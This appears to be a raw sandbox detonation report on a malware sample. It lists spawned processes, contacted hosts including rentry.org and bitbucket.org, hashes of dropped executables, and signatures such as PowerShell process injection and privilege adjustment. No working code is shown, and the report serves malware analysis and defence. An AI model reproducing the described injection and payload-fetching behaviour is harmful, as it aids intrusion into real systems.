C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | 203.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 105.58.132.164.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
memory/1672-0-0x0000000000590000-0x0000000000598000-memory.dmp
memory/1672-1-0x00007FFB52013000-0x00007FFB52015000-memory.dmp
memory/2720-3-0x000001C46C620000-0x000001C46C642000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ra3fmhi4.3g3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2720-13-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
memory/2720-14-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
memory/2720-15-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
memory/2720-16-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
memory/2720-17-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b0.exe
| MD5 | b23b19cddba1a89815fe4f0409d92c89 |
| SHA1 | fffd47156c8072995a94d981fb4d5250bdc22db4 |
| SHA256 | 96a733f74dd92c7787c1b422508ce76fdda7a1b58af0a5c865c72512b24c108d |
| SHA512 | 4e2f458f141d704afa27b8c180c7396064ca07b85d414358e7da0e0af9b085629fdc38132d8ab2403ec647ee7bb01b1b72c58de15860b021e732e200bbf17403 |
C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b1.exe
| MD5 | c93d65bc0ed7ee88d266b4be759301f8 |
| SHA1 | 8c0c415ba824737c61904676e7132094f5710099 |
| SHA256 | f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f |
| SHA512 | 7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1 |
C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe
| MD5 | f55fc8c32bee8f7b2253298f0a0012ba |
| SHA1 | 574c7a8f3eb378c03f58bc96252769296b20970e |
| SHA256 | cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9 |
| SHA512 | c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a |
memory/3504-41-0x0000000000B70000-0x0000000000BDD000-memory.dmp
memory/2720-52-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9DE6.tmp\9DE7.tmp\9DE8.bat
| MD5 | 022f1f2e0083954f32f822f0dcc6ee0d |
| SHA1 | cf2a0d686fcf2f48945df19005d1f3beb5f415c6 |
| SHA256 | bfda7e598935d6814476e0219a356b705341b7882075d20fd506117c013b201c |
| SHA512 | d825bb12b0cf8c18799cf32128f8983727a16840de7354140d4bcbed19619d17908d1d16060ee8449798ccc66c8379dfe8ef61ce0e0607c303c8caf6fdb96c57 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0d53533b226ada04703fc90b556978a4 |
| SHA1 | 4bf5e331fce099468eb2f4f34cbedf9411ddb8ae |
| SHA256 | 1589ebd677356cd2f45d1c79acfe8b8c2e03fa64931aff06e0fd9298cddd58e3 |
| SHA512 | 1215eb84f69328a4bd085dddb4451d027d2569f4d7990b2e492682e17c5aa327015016a27cd384aa4968dfbaea731446b74b0562d73a41ce280e5caab32e3b55 |
memory/3504-66-0x0000000003F80000-0x0000000004380000-memory.dmp
memory/3504-67-0x0000000003F80000-0x0000000004380000-memory.dmp
memory/3504-68-0x00007FFB6FFB0000-0x00007FFB701A5000-memory.dmp
memory/3504-70-0x00000000772B0000-0x00000000774C5000-memory.dmp
memory/3220-71-0x0000000000170000-0x0000000000179000-memory.dmp
memory/3504-72-0x0000000000B70000-0x0000000000BDD000-memory.dmp
memory/3220-74-0x0000000001F70000-0x0000000002370000-memory.dmp
memory/3220-77-0x00000000772B0000-0x00000000774C5000-memory.dmp
memory/3220-75-0x00007FFB6FFB0000-0x00007FFB701A5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0f6a3762a04bbb03336fb66a040afb97 |
| SHA1 | 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74 |
| SHA256 | 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383 |
| SHA512 | cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69 |
memory/3452-94-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3452-92-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3452-91-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3452-93-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3452-97-0x00007FFB6FFB0000-0x00007FFB701A5000-memory.dmp
memory/3452-98-0x00007FFB6E000000-0x00007FFB6E0BE000-memory.dmp
memory/3452-96-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3452-100-0x0000000140000000-0x000000014002B000-memory.dmp
memory/316-114-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/316-111-0x0000013744B60000-0x0000013744B8B000-memory.dmp
memory/952-118-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/952-117-0x0000021B9ED00000-0x0000021B9ED2B000-memory.dmp
memory/408-145-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/408-144-0x00000208E4170000-0x00000208E419B000-memory.dmp
memory/1300-142-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1300-141-0x00000168AA0B0000-0x00000168AA0DB000-memory.dmp
memory/1212-139-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1212-138-0x000002B5771B0000-0x000002B5771DB000-memory.dmp
memory/1124-136-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1124-135-0x000002109CE90000-0x000002109CEBB000-memory.dmp
memory/1100-133-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1100-132-0x000001EC5F370000-0x000001EC5F39B000-memory.dmp
memory/1088-130-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1088-129-0x000001B352D40000-0x000001B352D6B000-memory.dmp
memory/392-127-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/392-126-0x0000022842E90000-0x0000022842EBB000-memory.dmp
memory/612-112-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/612-110-0x00000181F7280000-0x00000181F72AB000-memory.dmp
memory/680-105-0x000001E5FA2D0000-0x000001E5FA2FB000-memory.dmp
memory/680-106-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/612-103-0x00000181F71F0000-0x00000181F7214000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win7-20240508-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\elf.dll,#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240426-en
Max time kernel
93s
Max time network
204s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\wer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240508-en
Max time kernel
132s
Max time network
213s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\dxil.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240508-en
Max time kernel
136s
Max time network
193s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\elf.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.90.14.23.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240226-en
Max time kernel
233s
Max time network
302s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\eventlog_provider.dll,#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4104 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| GB | 23.44.234.16:80 | tcp | |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.90.14.23.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240426-en
Max time kernel
96s
Max time network
223s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win7-20240508-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\wer.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win7-20240221-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1996 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1996 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1996 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
